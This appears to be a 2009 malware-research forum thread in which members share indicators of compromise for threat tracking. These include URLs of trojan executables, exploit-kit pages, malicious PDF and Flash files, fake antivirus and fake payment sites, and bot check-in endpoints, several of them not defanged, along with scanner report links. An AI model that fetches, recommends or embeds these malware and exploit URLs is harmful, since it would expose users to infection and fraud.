hxxp://www.2a8k.cn/d/11.exe
hxxp://www.2a8k.cn/d/19.exe
hxxp://www.2a8k.cn/d/10.exe
hxxp://www.2a8k.cn/d/18.exe
hxxp://www.2a8k.cn/d/9.exe
hxxp://www.2a8k.cn/d/3.exe
hxxp://www.2a8k.cn/d/4.exe
hxxp://www.2a8k.cn/d/7.exe
hxxp://www.2a8k.cn/d/2.exe
hxxp://www.2a8k.cn/d/17.exe
hxxp://www.2a8k.cn/d/16.exe
hxxp://www.2a8k.cn/d/15.exe
hxxp://www.2a8k.cn/d/14.exe
hxxp://www.2a8k.cn/d/12.exe
hxxp://www.2a8k.cn/d/1.exe
Quote
hxxp://5yttrre.cn/xx33.exe
hxxp://5yttrre.cn/xx13.exe
hxxp://5yttrre.cn/xx26.exe
hxxp://5yttrre.cn/xx27.exe
hxxp://5yttrre.cn/xx28.exe
hxxp://5yttrre.cn/xx29.exe
hxxp://5yttrre.cn/xx30.exe
hxxp://5yttrre.cn/xx31.exe
hxxp://5yttrre.cn/xx11.exe
hxxp://5yttrre.cn/xx9.exe
hxxp://5yttrre.cn/xx12.exe
hxxp://5yttrre.cn/xx14.exe
hxxp://5yttrre.cn/xx10.exe
hxxp://5yttrre.cn/xx39.exe
hxxp://5yttrre.cn/xx15.exe
hxxp://5yttrre.cn/xx32.exe
hxxp://5yttrre.cn/xx8.exe
hxxp://5yttrre.cn/xx17.exe
hxxp://5yttrre.cn/xx23.exe
hxxp://5yttrre.cn/xx20.exe
hxxp://5yttrre.cn/xx22.exe
hxxp://5yttrre.cn/xx25.exe
hxxp://5yttrre.cn/xx18.exe
hxxp://5yttrre.cn/xx19.exe
hxxp://5yttrre.cn/xx24.exe
hxxp://5yttrre.cn/xx6.exe
hxxp://5yttrre.cn/xx16.exe
hxxp://5yttrre.cn/xx3.exe
hxxp://5yttrre.cn/xx21.exe
hxxp://5yttrre.cn/xx5.exe
hxxp://5yttrre.cn/xx2.exe
hxxp://5yttrre.cn/xx4.exe
hxxp://5yttrre.cn/xx7.exe
hxxp://5yttrre.cn/xx1.exe
Title: Re: daily something......
Post by: promised on June 09, 2009, 06:58:24 pm
Quote
hxxp://u.987255.com/image/svchost.jpg
hxxp://u.987255.com/image/dd.jpg
hxxp://u.987255.com/image/bd.jpg
hxxp://a.05916.com:666/40.jpg
hxxp://u.987255.com/image/zy.jpg
hxxp://download.leeboo.com/Gvod15_286.exe
hxxp://download.leeboo.com/QvodSetup13_286.exe
hxxp://www.rtmmd.cn/h/5.exe
hxxp://58.215.79.176:88/b8.exe
hxxp://58.215.79.176:8080/b3.exe
hxxp://58.215.79.176:88/5.exe
hxxp://58.215.79.176:88/10.exe
hxxp://58.215.79.176:88/7.exe
hxxp://58.215.79.176:88/cpa.exe
hxxp://121.10.108.42/cj/1hqq.exe
hxxp://59.34.197.133/down/25.exe
hxxp://121.10.108.42/cj/2hqq.exe
hxxp://59.34.197.133/down/24.exe
hxxp://59.34.197.133/down/21.exe
hxxp://59.34.197.133/down/23.exe
hxxp://59.34.197.133/down/18.exe
hxxp://59.34.197.133/down/12.exe
hxxp://59.34.197.133/down/11.exe
hxxp://59.34.197.133/down/13.exe
hxxp://59.34.197.133/down/14.exe
hxxp://59.34.197.133/down/17.exe
hxxp://59.34.197.133/down/16.exe
hxxp://59.34.197.133/down/9.exe
hxxp://59.34.197.133/down/10.exe
hxxp://59.34.197.133/down/8.exe
hxxp://59.34.197.133/down/7.exe
hxxp://59.34.197.133/down/19.exe
hxxp://59.34.197.133/down/6.exe
hxxp://59.34.197.133/down/3.exe
hxxp://59.34.197.133/down/2.exe
hxxp://59.34.197.133/down/22.exe
hxxp://59.34.197.133/down/4.exe
hxxp://59.34.197.133/down/1.exe
Title: Re: daily something......
Post by: CM_MWR on June 09, 2009, 07:27:36 pm
FO
Title: Re: daily something......
Post by: promised on June 10, 2009, 04:55:05 am
Quote
hxxp://alfafoxx.com/temp/find26.exe
hxxp://alfafoxx.com/temp/ret26.exe
hxxp://alfafoxx.com/temp/ldr26.exe
hxxp://www.alfafoxx.com/mldr/data/mbt.exe
Title: Re: daily something......
Post by: sursmurf on June 10, 2009, 08:51:36 pm
Trojan:
Code: [Select]
hXXp://mediahousenamebuyvideo.cn:8080/load.phpVT 8/40
http://www.virustotal.com/sv/analisis/93a126695d599d3c50147010fe2f337155f211b8fd43256e9ec89c77e4ed84bb-1244666759 (http://www.virustotal.com/sv/analisis/93a126695d599d3c50147010fe2f337155f211b8fd43256e9ec89c77e4ed84bb-1244666759)

PDF:
Code: [Select]
hXXp://mediahousenamebuyvideo.cn:8080/cache/readme.pdfVT 15/40
http://www.virustotal.com/sv/analisis/948c50b18fcd2a2f71faf6257fcddcdacfa5ed55af17ceafecced4bdd8ebab8a-1244666624

Flash:
Code: [Select]
hXXp://mediahousenamebuyvideo.cn:8080/cache/flash.swfVT 22/39
http://www.virustotal.com/sv/analisis/8fa7088e7dae6ff5f9c4f5eaff14de22e2198b28946472486a5045e44d0d5b5d-1244666646
Title: Re: daily something......
Post by: promised on June 11, 2009, 05:24:08 am
banker
Quote
hxxp://71.174.51.86/images/logout.jpg
Title: Re: daily something......
Post by: Malware-Web-Threats on June 11, 2009, 05:43:25 am
Code: [Select]
jenesaisrien.com:8080/load.php
vds659.sivit.org:8080/load.php
shopmoviefestival.cn:8080/load.php
s72-38-121-90.static.comm.cgocable.net:8080/load.php
static-86-94.is.net.pl:8080/load.php
s15238535.onlinehome-server.info:8080/load.php
tweetwitter.com:8080/load.php
gianttopdiscover.cn:8080/load.php
247orders.com:8080/load.php
4-job.com:8080/load.php
server.edwinbuckley.co.uk:8080/load.php
infostore.ca:8080/load.php
roleski.pl:8080/load.php
wtssurvey.com:8080/load.php
findabigrig.cn:8080/load.php
shopmovieproduction.cn:8080/load.php
fancystarlight.com:8080/load.php
lomianki.com:8080/load.php
thegeekdude.com:8080/load.php
theadsensekid.com:8080/load.php
thehomename.cn:8080/load.php
eszafiry.com:8080/load.php
mlodapara.com:8080/load.php
obraczki.com:8080/load.php
readymixbet.cn:8080/load.php
namemartfilmlife.cn:8080/index.php
xbuzzer.com:8080/load.php
spigotinch.com:8080/load.php
smsconnectnow.com:8080/load.php
numberingcite.com:8080/load.php
typicalprecedent.com:8080/load.php
findyourbigidea.cn:8080/load.php
findbigthinkers.cn:8080/load.php
bigskytopguide.cn:8080/load.php
michaelsbestway2findalawyer.cn:8080/load.php
hugetopseek.cn:8080/load.php

VirusTotal (http://www.virustotal.com/analisis/01f8a46219acc32a149b4707bca32dfcca1d88fd794a27266a8f071a2845aea2-1244687707)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=fae47a0d3048e1609c253994ea368e79)
Quote
hxxp://78.109.29.116/new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=13441600&rnd=981633
Title: Re: daily something......
Post by: Malware-Web-Threats on June 11, 2009, 09:12:40 am
redirects by telemedia.m77s[.]cn:
Wepawet (http://wepawet.iseclab.org/view.php?hash=d33a97ac078bb1833726bfcfbe9b9650&t=1244705876&type=js)

exploits:
Code: [Select]
f97q.cn/images/index.php
Wepawet (http://wepawet.cs.ucsb.edu/view.php?type=js&hash=9b458aab745351364b38a99f25e11da7&t=1244704241)

pdf:
Code: [Select]
f97q.cn/images/spl/pdf.pdf
Wepawet (http://wepawet.iseclab.org/view.php?hash=d0cb3cb6a3061e3a2c7e0ce31f5bb788&t=1244706026&type=js)

trojan:
Code: [Select]
f97q.cn/images/exe.php
VirusTotal (http://www.virustotal.com/analisis/612022bd60334f8b1b79d5887d5515fda41cda55340bfd9f516ae041f89a519a-1244561761) - 6/40 (15.00%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1fb5448a0ba130c0445cee1879e067d03&format=html)

Quote
From ANUBIS:1032 to 78.109.25.217:80 - [r99u.cn] 
Request: GET /myl/464664.php?id=470261258&v=101&tm=33&b=9671316727 
Response: 200 "OK" 
Request: GET /myl/exe/loader.exe 
Response: 200 "OK"
 
Title: Re: daily something......
Post by: CkreM on June 11, 2009, 03:27:25 pm
Trojan:
Code: [Select]
fer5woi.ru/1t.exeTrojan:
Code: [Select]
dirtylivesex.net/fuflo_v1.exehttp://www.virustotal.com/analisis/4784550551e642a6f133bfec4877af63a801d48f01e7fa6c33378abf1ed167e9-1244732363
Trojan:
Code: [Select]
rezident77.ru/files/s66.exehttp://www.virustotal.com/analisis/403f79bd1e23384be42728583872ba6eb43621db55c7a7aaea242f79938f8f24-1244732262

Exploits:
Code: [Select]
domainzzoom.ru/in.phphttp://wepawet.iseclab.org/view.php?hash=dacf686bc48b5f9aec70cc8cbc6b248e&t=1244731801&type=js
PDF:
Code: [Select]
domainzzoom.ru/pdf.phpfake AV:
Code: [Select]
domainzzoom.ru/load.php?id=2http://www.virustotal.com/analisis/d1c8dea9489502866622d1d45d0a0fe80eb06ede51b32484711416a96cd1df1f-1244731949

fake payment site:
Code: [Select]
securebillingsoftware.com/buy.php?affid=03500
Title: Re: daily something......
Post by: Malware-Web-Threats on June 12, 2009, 09:42:03 pm
redirects:
Code: [Select]
thelotmachine.cn:8080/in.cgi
thenetnameshop.cn:8080/in.cgi
compoundcapitolgroup.cn:8080/in.cgi
mixlotworld.cn:8080/in.cgi
superlottry.cn:8080/in.cgi
webnamemart.cn:8080/in.cgi

payloads:
Code: [Select]
adsl.141.255.0.72.maskatel.ca:8080/load.php
bunchguide.cn:8080/load.php
bigtopfindsite.cn:8080/load.php
bigtopfindsite.cn:8080/cache/readme.pdf
bigtopfindsite.cn:8080/cache/flash.swf
filmlifeimages.cn:8080/load.php
filmlifeimages.cn:8080/cache/readme.pdf
filmlifeimages.cn:8080/cache/flash.swf
findbigshots.cn:8080/load.php
findbigshots.cn:8080/cache/readme.pdf
findbigshots.cn:8080/cache/flash.swf
giantpremium.cn:8080/load.php
giantpremium.cn:8080/cache/readme.pdf
giantpremium.cn:8080/cache/flash.swf
gianttopnano.cn:8080/load.php
gianttopnano.cn:8080/cache/readme.pdf
gianttopnano.cn:8080/cache/flash.swf
mediahomenameshopmovie.cn:8080/load.php
mediahomenameshopmovie.cn:8080/cache/readme.pdf
mediahomenameshopmovie.cn:8080/cache/flash.swf
nameshopinternational.cn:8080/load.php
nameshopinternational.cn:8080/cache/readme.pdf
nameshopinternational.cn:8080/cache/flash.swf
newnetnameshop.cn:8080/load.php
newnetnameshop.cn:8080/cache/readme.pdf
newnetnameshop.cn:8080/cache/flash.swf
shopmovielife.cn:8080/load.php
shopmovielife.cn:8080/cache/readme.pdf
shopmovielife.cn:8080/cache/flash.swf
yournameshop.cn:8080/load.php
yournameshop.cn:8080/cache/readme.pdf
yournameshop.cn:8080/cache/flash.swf

exe:
http://www.virustotal.com/analisis/25db455ed35b759dc3a6924359bd72c37f9cc3b13edac98a96894e344d45078d-1244797876 (http://www.virustotal.com/analisis/25db455ed35b759dc3a6924359bd72c37f9cc3b13edac98a96894e344d45078d-1244797876)
http://anubis.iseclab.org/?action=result&task_id=1c7642f4324780a04014ee1900012c257 (http://anubis.iseclab.org/?action=result&task_id=1c7642f4324780a04014ee1900012c257)

pdf:
http://wepawet.iseclab.org/view.php?hash=d21d612330db155dcbd75191a9b7c021&t=1244801268&type=js (http://wepawet.iseclab.org/view.php?hash=d21d612330db155dcbd75191a9b7c021&t=1244801268&type=js)

flash:
http://wepawet.iseclab.org/view.php?hash=3e05fc4fd1c7a49f8478da9c76c7c435&type=swf (http://wepawet.iseclab.org/view.php?hash=3e05fc4fd1c7a49f8478da9c76c7c435&type=swf)
http://www.virustotal.com/analisis/8fa7088e7dae6ff5f9c4f5eaff14de22e2198b28946472486a5045e44d0d5b5d-1244133184 (http://www.virustotal.com/analisis/8fa7088e7dae6ff5f9c4f5eaff14de22e2198b28946472486a5045e44d0d5b5d-1244133184)

http://www.threatexpert.com/report.aspx?md5=7264e961f25beaa201906e4086caa1ce (http://www.threatexpert.com/report.aspx?md5=7264e961f25beaa201906e4086caa1ce)
Title: Re: daily something......
Post by: bobby on June 14, 2009, 08:02:43 pm
Code: [Select]
http://nyfilmlife.cn:8080/index.phpleads to:
Code: [Select]
http://gianttoplocate.cn:8080/load.php?id=0
http://gianttoplocate.cn:8080/load.php?id=1
http://nyfilmlife.cn:8080/cache/readme.pdf
http://nyfilmlife.cn:8080/cache/flash.swf
http://gianttoplocate.cn:8080/landig.php?id=4
Title: Re: daily something......
Post by: CM_MWR on June 15, 2009, 06:28:40 am
FO
Title: Re: daily something......
Post by: CkreM on June 15, 2009, 07:16:21 am
Fake AV:
Code: [Select]
pornotube912.com/scan/Trojan:
Code: [Select]
194.33.180.41/rferfref5.exehttp://www.virustotal.com/analisis/5859892e44a0ab804ea7ec37b6313f089e2f47d87ee83c3528e84ccdea35e4a8-1245048501

Exploits:
Code: [Select]
rtm-books.co.uk/ad/index.phphttp://wepawet.iseclab.org/view.php?hash=7bba4edc1abb1608785379e50afad535&t=1245048299&type=js
PDF:
Code: [Select]
rtm-books.co.uk/ad/include/two.pdfTrojan:
Code: [Select]
rtm-books.co.uk/ad/load.phphttp://www.virustotal.com/analisis/4a92f221548e9c84903ab15ec49281ffd16f0c74ee4e075bbaab48f6dbeb8c19-1245048374

Exploits:
Code: [Select]
viva-delpinata2.com/2/index.phphttp://wepawet.iseclab.org/view.php?hash=cf45d657fe06a83f99b2d6518f4714ca&t=1245048311&type=js
PDF:
Code: [Select]
viva-delpinata2.com/2/notTheoryCites.pdfFlash:
Code: [Select]
viva-delpinata2.com/2/normalLeap.swfTrojan:
Code: [Select]
viva-delpinata2.com/2/update.phphttp://www.virustotal.com/analisis/3b21cb087180f5d3cc067d9fd8198b745635130038aa5587d7e3b1f4e9ee37c8-1245022898
Title: Re: daily something......
Post by: sparsha on June 15, 2009, 03:56:03 pm
New Rogue sites
Code: [Select]

protectionsystem.org
protectionsystemlab.com/psystem.exe

Core-guard-antivirus.com
fullguardlab.com
fullprotect.org

http://gosoonscan.com/?uid=13002
http://planscan4.info/download/install.php

http://ina4id.com/download/InternetAntivirusPro.exe
http://ina4id.com/download/file.exe

Title: Re: daily something......
Post by: CkreM on June 15, 2009, 04:35:48 pm
AV downloader
Code: [Select]
joomlaprojects.cn/file.exehttp://www.virustotal.com/analisis/a56d5fcf47517f96978014bee0d1ca5a67be4d9d2725643c9f91e947f2d48c1e-1245081896

Fake AV:
Code: [Select]
antivirus-2009-ppro.com/cgi-bin/download.pl?code=0000282http://www.virustotal.com/analisis/078c85cd91583f821aaf3d8c5588785fab192d32ae09a7fad5da0f45e668e2c7-1245082096
Code: [Select]
joomlaprojects.cn/install.exehttp://www.virustotal.com/analisis/7f041ff1df6e693585fdf1c5be1fb39c2de3d1c0f358ae35612c48da39ebbda9-1245082461
Code: [Select]
haos-in.ru/3_install.exehttp://www.virustotal.com/analisis/c60c9f6772c6416c366783b5edf8c96b619fcd86bdafdcb737bcd388cd7d668c-1245084099


Fake payment sites:
Code: [Select]
advanced-virusremover2009.com/buy/?code?code=0000282
https://www.securebillingsoftware.com/buy.php?affid=05100   (works with https only)

Trojan:
Code: [Select]
onuka.cn/dll/em.txthttp://www.virustotal.com/analisis/d979c2f805ce2e01d21e49aad39e3ff0f2aa7e98c86b0e5671a7c4868bfa5640-1245082890
Trojan:
Code: [Select]
218.6.12.82/winrar.exehttp://www.virustotal.com/analisis/b687f6673db5072334cb6a13f6d59f303cf3302258939b93403fb26bbae6e984-1245083262
Title: Re: daily something......
Post by: Malware-Web-Threats on June 16, 2009, 12:37:14 am
redirects:
Code: [Select]
globalmixgroup.cn:8080/in.cgi

payloads:
Code: [Select]
bigbestlite.cn:8080/load.php
bigbestlite.cn:8080/cache/readme.pdf
bigbestlite.cn:8080/cache/flash.swf

bigtopfestival.cn:8080/load.php
bigtopfestival.cn:8080/cache/readme.pdf
bigtopfestival.cn:8080/cache/flash.swf

mixbetonline.cn:8080/load.php
mixbetonline.cn:8080/cache/readme.pdf
mixbetonline.cn:8080/cache/flash.pdf

themixbet.cn:8080/load.php
themixbet.cn:8080/cache/readme.pdf
themixbet.cn:8080/cache/flash.swf

VirusTotal (http://www.virustotal.com/analisis/e85beb2ea40aac707863221ce5189863288583550453b5ad3c19aa31aa2c6f9a-1245076415): 1/40
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=9e95cda3645f97fab3235ac21a625a2a)
Title: Re: daily something......
Post by: CkreM on June 16, 2009, 05:30:37 am
Trojans:
Code: [Select]
almasto.net/ins.exe
biggerz.net/ins.exe
Camposceola.com/ins.exe
http://www.virustotal.com/analisis/33c3518f7555aa7b407570e8174133563621629ff2ff8e3c468ffca8da703f3b-1245123021
Code: [Select]
almasto.net/sdfsdf.exehttp://www.virustotal.com/analisis/3e9314888ad11497839781d9a4c9325e36caf86d59bc1ac7ece987e9c56a777b-1245122926
Code: [Select]
friendslinks.com/0/new.exehttp://www.virustotal.com/analisis/68fbe09bcbe4464d9644a57444d9e94f43fd04a2fe42a35ab0f0274cbf14f9ce-1245121971
Code: [Select]
xz.ub9.net/winres.exehttp://www.virustotal.com/analisis/396abb55f933c0df23e78582f5b13738bb799d260618959998f0245c058704f3-1245123148
Code: [Select]
heyjoy.cn/612.exehttp://www.virustotal.com/analisis/652c1cff90096824647b2377b4850fb47f4b6f6abe470eb0114f51d9de86a2a6-1245123263

Exploits:
Code: [Select]
almasto.net/lnk.php?embedded=falsehttp://wepawet.cs.ucsb.edu/view.php?hash=27262e8c3f678960412e6ecd940ccd3f&t=1245109604&type=js

Fake AV downloader:
Code: [Select]
friendslinks.com/0/loyalbox.exehttp://www.virustotal.com/analisis/776c883badde97f0577d6b11eb759ea9f85302a96d79f4446d3eb4e4399051a0-1245122144
Code: [Select]
porno-tube-xxx.us/loader/index.php?userid=id_0079http://www.virustotal.com/analisis/26e35006830b010d1d7c97541f1cf960e3b9e8d4d611e5b991132c1634fe92c2-1245122608

Fake AV:
Code: [Select]
you-adult-tube.co.cc/setup.exehttp://www.virustotal.com/analisis/f2dd78517405edeeacc4b06eab567a54e54b9306d18f02ed620a55cb45abbcbd-1245122729

gives koobface related malware links:
Code: [Select]
upr15may.com/ld/gen.php
Title: Re: daily something......
Post by: CM_MWR on June 17, 2009, 12:58:15 pm
FO
Title: Re: daily something......
Post by: CkreM on June 18, 2009, 02:47:14 am
Code: [Select]
yag0yag0.co.cc/index2.phpwepawet seems to fail on this one.
http://jsunpack.jeek.org/dec/go?url=yag0yag0.co.cc_new_index2.php
flash:
Code: [Select]
yag0yag0.co.cc/new/i.swfhttp://wepawet.cs.ucsb.edu/view.php?hash=8fdc5af28af58910fedd022b60bd40f2&type=swf
Trojan:
Code: [Select]
yag0yag0.co.cc/new/img.phphttp://www.virustotal.com/analisis/40515c53fea41dcbf7aa7342dda135ee981781500d7b9c6750e9204a5f8ce091-1245293368
Title: Re: daily something......
Post by: CkreM on June 18, 2009, 07:02:25 am
Fake AV:
Code: [Select]
ameraif.cn
amayrex.cn
adiosma.cn
ameycva.cn
apauzy.cn
securitytoolsworld.com

K00bface:
Code: [Select]
niceshoot89.com/software/04f456eca8/30000/1/Setup.exehttp://www.virustotal.com/analisis/33ee8d94223dc222cb5a4358f5ab4366dd3c4eeb43d2a7d2a2a3905c4e36cb25-1245307967
Title: Re: daily something......
Post by: CkreM on June 21, 2009, 07:25:00 am
Koobface:
Code: [Select]
nicevideo18.net/software/ea2faf7008/11400/1/Setup.exe
Exploits:
Code: [Select]
adultfex.com/lb/index.phphttp://wepawet.iseclab.org/view.php?hash=ffcb0d874f69382bc4e54caf0b450406&t=1245563029&type=js
PDF:
Code: [Select]
adultfex.com/lb/humourAlwaysHumour.pdfFlash:
Code: [Select]
adultfex.com/lb/usesHumour.swfTrojan:
Code: [Select]
adultfex.com/lb/update.phphttp://www.virustotal.com/analisis/4718ef3d0a751e94ce3a0e20385283d995ee82136e9638892eaf6bbc4795a3e5-1245563087

Trojans:
Code: [Select]
slil.ru/27769294/2fcdca20.4a3e7138/adware_crypt.exehttp://www.virustotal.com/analisis/0a08059aeaa955de3f5d08546f28c83db855d761082c4205811819195e185b04-1245566730
Code: [Select]
freshdownloadcenter.com/install.48232.exehttp://www.virustotal.com/analisis/debf5446d9ed6394fa72bb78f52e4e6ccffe0e4ec8960a3b7c0a2e92a714c369-1245566838
Code: [Select]
www.adult-you-tube.info/downloads/setup.exehttp://www.virustotal.com/analisis/38700a97d35bf78118d3c48d5f37a9150c18d194de58adb43dc6da27942bfc6b-1245567493
Code: [Select]
72.9.108.26/install_10.exehttp://www.virustotal.com/analisis/186ef67fadf42ac6eaee2b5d26a093e9adef6178caa8b42bd3f825405892c4c8-1245567635
Code: [Select]
adwareindependence.com/ppc/f494.exehttp://www.virustotal.com/analisis/b5006cc39bf7a7ff6a1b71c6d9033f67657cffae429ae34bc01b3c2f42ea7157-1245567981

Fake AV(malware doctor):
Code: [Select]
adwareindependence.com/scan/mlw.exehttp://www.virustotal.com/analisis/bfc294ae9aa0da8fd65544bdea740fc48b94b1608c7f9d99e6092153dd2029cd-1245567989

Fake payment site:
Code: [Select]
secure.best-internet-payments.com/cgi-bin/nph-pr/pandora/softcore/buy_soft.php?productid=malwaredoc01&advert=494malware calls home(receive malware links with the right parameters):
Code: [Select]
softwaresense-search.com/stat.php
Title: Re: daily something......
Post by: CkreM on June 22, 2009, 06:25:46 am
Exploits:
Code: [Select]
sterlate.comhttp://wepawet.iseclab.org/view.php?hash=f74e05ee99c0e925663a3451f1d85f34&t=1245570059&type=js
PDF:
Code: [Select]
sterlate.com/cache/readme.pdfFlash:
Code: [Select]
sterlate.com/cache/flash.swf(downloaded malware is offline)

Exploits:
Code: [Select]
sterlate.com/sng/index.phphttp://wepawet.iseclab.org/view.php?hash=d78519f72f81a626f04873713067717f&t=1245651339&type=js
PDF:
Code: [Select]
sterlate.com/sng/cache/readme.pdfFlash:
Code: [Select]
sterlate.com/sng/cache/flash.swfhttp://wepawet.iseclab.org/view.php?hash=253639a3e73fff185fbd4c489ab0335b&type=swf
Trojan:
Code: [Select]
sterlate.com/sng/load.php?id=5http://www.virustotal.com/analisis/a8ed3a72616d4d87020d37d7d2b90e2fcc32a5133d535d091970998fe39cd129-1245411696


Exploits(wepawet fails on this one):
Code: [Select]
forum.sc00d.cn/index.phphttp://jsunpack.jeek.org/dec/go?url=forum.sc00d.cn_index.php
PDF:
Code: [Select]
forum.sc00d.cn/pdf.php?id=11Trojan:
Code: [Select]
forum.sc00d.cn/load.php?id=11&spl=4http://www.virustotal.com/analisis/ff60d4703813e84c5237c95aa0f0c52295945c8f76f03152fa4dd6972e1b3263-1245649899

Trojans:
Code: [Select]
nsmercuryplanet.ru/dast.exehttp://www.virustotal.com/analisis/7d515de9754257b6d5cbc05682bb7d82d2d7c92786f51bb9fecd291f64ad6739-1245649810
Code: [Select]
gold-smerch.cn/flash.exehttp://www.virustotal.com/analisis/140a5961f36bd6a2645f77e74defd8985084f6a6fed6592920aba48eb511ea7d-1245649827

Malware calls home:
Code: [Select]
bytecode.biz/stats/in.php
Title: Re: daily something......
Post by: sparsha on June 22, 2009, 05:21:44 pm
More rogue sites:
Code: [Select]

Internetware-safe.com
Kingpinservers.info
Mal-warexls.net

http://youravprotection.com/support
http://www.registerantivirus.com/
http://www.avprotectionstat.com/index.php
Title: Re: daily something......
Post by: sursmurf on June 24, 2009, 12:59:35 pm
Code: [Select]
hXXp://ribboninn.com/djellow.exe
[VT 5/41]
http://www.virustotal.com/sv/analisis/3a93b168267d7ddc8c034303b817e0ea297a000df40761bb7f5a79faa68bb295-1245847100 (http://www.virustotal.com/sv/analisis/3a93b168267d7ddc8c034303b817e0ea297a000df40761bb7f5a79faa68bb295-1245847100)
Title: Re: daily something......
Post by: sursmurf on June 24, 2009, 07:10:58 pm
Another site, same file as above

Code: [Select]
http://76380.webhosting29.1blu.de/djellow.exe
Title: Re: daily something......
Post by: sursmurf on June 25, 2009, 10:16:34 am
New binary and URL

Code: [Select]
http://www.hzcpwl.cn/djellow.exe
[VT 6/41]
http://www.virustotal.com/sv/analisis/2b27e47c7f8d2195d5473d400a1e4ccec79049c6d84203e27003e5e2daaa95b7-1245924902 (http://www.virustotal.com/sv/analisis/2b27e47c7f8d2195d5473d400a1e4ccec79049c6d84203e27003e5e2daaa95b7-1245924902)
Title: Re: daily something......
Post by: sursmurf on June 25, 2009, 11:43:53 am
Code: [Select]
http://transein.com/_test_01-07/getexe.php
[VT 5/41]
http://www.virustotal.com/sv/analisis/7d168c70d66f83b9876c31227af4e595b5d40ea03df6a624f8669c2cddb9661f-1245929271 (http://www.virustotal.com/sv/analisis/7d168c70d66f83b9876c31227af4e595b5d40ea03df6a624f8669c2cddb9661f-1245929271)
Title: Re: daily something......
Post by: sursmurf on June 25, 2009, 03:06:44 pm
Code: [Select]
http://213.182.197.42/load.php[VT 10/41]
http://www.virustotal.com/sv/analisis/2cc7714f5b1d89fd90aa73df48f1770f1e7222553fe1955542ca82194f114d18-1245941662 (http://www.virustotal.com/sv/analisis/2cc7714f5b1d89fd90aa73df48f1770f1e7222553fe1955542ca82194f114d18-1245941662)

PDF
Code: [Select]
http://213.182.197.42/pdf.php[VT 10/41]
http://www.virustotal.com/sv/analisis/0ce86e1f37aa5fd6651a2d40bf9b3c3d9dce6859a4fabf0e72fdff2de42a1f1d-1245941687
 (http://www.virustotal.com/sv/analisis/0ce86e1f37aa5fd6651a2d40bf9b3c3d9dce6859a4fabf0e72fdff2de42a1f1d-1245941687)

Flash
Code: [Select]
http://213.182.197.42/swf.php[VT 9/41]
http://www.virustotal.com/sv/analisis/ff04bb1c9f9b2d20ec22cabbd6c7d6e382762961080440a9418731a4b05be15d-1245941702 (http://www.virustotal.com/sv/analisis/ff04bb1c9f9b2d20ec22cabbd6c7d6e382762961080440a9418731a4b05be15d-1245941702)
Title: Re: daily something......
Post by: CkreM on June 26, 2009, 03:19:34 am
Trojans:
Code: [Select]
satanic.easycoding.org/file.exehttp://www.virustotal.com/analisis/eb70c986ee061898ce2c23e2b37a92a65458f0744aebe2e4e7838a70023cafec-1245985908
Code: [Select]
keule557.cn/2.exehttp://www.virustotal.com/analisis/0bb0fab4f476de542bcae7b8338793e705d4bbaad2511210e94958784e45aec3-1245985956
Code: [Select]
keule557.cn/805.exehttp://www.virustotal.com/analisis/d1ab115a3b62876adcbd571be2be685e1af1672f506b8a084e52308fc5dbdcd9-1245985980
Code: [Select]
usrvnu.ru/infect.phphttp://www.virustotal.com/analisis/b7b4f921db11b06919834a8f8b2c96efabe8d6919da067ea011d736e37c2187e-1245986114
Code: [Select]
roons.cn/ded/Project2.exehttp://www.virustotal.com/analisis/d07e34d88fa067fe1d942670df0dad29e555fd5841a19f46d47dd56f50f74be5-1245986217

Trojan Pinch:
Code: [Select]
woons.cn/pinch_no_cript.exe
Title: Re: daily something......
Post by: sursmurf on June 26, 2009, 12:55:17 pm
zbot
Code: [Select]
http://javiercubel.com/statement_45365352.exe
[VT9/41]
http://www.virustotal.com/sv/analisis/046d3796c3dc4620f2c54c6439f11a5f4dd3faf4d513ed0dcb9f640780009022-1246020252 (http://www.virustotal.com/sv/analisis/046d3796c3dc4620f2c54c6439f11a5f4dd3faf4d513ed0dcb9f640780009022-1246020252)
Title: Re: daily something......
Post by: sursmurf on June 26, 2009, 08:37:13 pm
Zbot
Code: [Select]
http://update.microsoft.com.hillij.com/microsoftofficeupdate/isapdl/default.aspx/officexp-KB910721-FullFile-ENU.exe
[VT 13/41]
http://www.virustotal.com/sv/analisis/b6c9a2125a43133d681be0e27aac281f404e29b5e6f031d04a789ff6f0bc8218-1246048421 (http://www.virustotal.com/sv/analisis/b6c9a2125a43133d681be0e27aac281f404e29b5e6f031d04a789ff6f0bc8218-1246048421)
Title: Re: daily something......
Post by: cjeremy on June 27, 2009, 02:13:49 am
PSW Trojan Fun:

Code: [Select]
http://winddk.ch.ma/dd.txtLeads to:
Code: [Select]
http://ztb.cztv.tv/360/1.exe
http://ztb.cztv.tv/360/2.exe
http://ztb.cztv.tv/360/7.exe
http://ztb.cztv.tv/360/88.exe
http://ztb.cztv.tv/360/9.exe

Been a while since I visited.  Hope all is well with everyone! ;)
Title: Re: daily something......
Post by: sursmurf on June 28, 2009, 01:54:53 pm
Code: [Select]
http://artmarket.or.kr/ecard.exe
[VT 6/41]
http://www.virustotal.com/sv/analisis/89e12bf34116897c63b6e1a98a328e16222f33dab4b2aee2400c60aa3e7a1aaf-1246197175 (http://www.virustotal.com/sv/analisis/89e12bf34116897c63b6e1a98a328e16222f33dab4b2aee2400c60aa3e7a1aaf-1246197175)
Title: Re: daily something......
Post by: Malware-Web-Threats on June 28, 2009, 06:07:17 pm
195.190.13.106 / Cutwail

Code: [Select]
hxxp://109438129432.cn/load.phpVirusTotal (http://www.virustotal.com/analisis/a1275ed1572e9eed052ebbcadaec941df6b0fccac2990a993ad32227bbc1ca4b-1244801070) - 23/40 (57.50%)
Code: [Select]
hxxp://234273849543.cn/load.phpVirusTotal (http://www.virustotal.com/analisis/a1275ed1572e9eed052ebbcadaec941df6b0fccac2990a993ad32227bbc1ca4b-1244801070) - 23/40 (57.50%)
Code: [Select]
hxxp://438723847234.cn/load.phpVirusTotal (http://www.virustotal.com/analisis/ce5ce251673ad3b9a00a8d3e3216d0435802c072f3e3460f9046c015a8eac075-1245938186) - 12/41 (29.27%)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=c05177060951769a260d29186dd978e2)

--
61.235.123.140
exploits / trojan

Code: [Select]
hxxp://witsibux.cn/hi/index.php
hxxp://witsibux.cn/hi/update.php
hxxp://witsibux.cn/hi/belowNotH.pdf
hxxp://witsibux.cn/hi/humourOf.swf
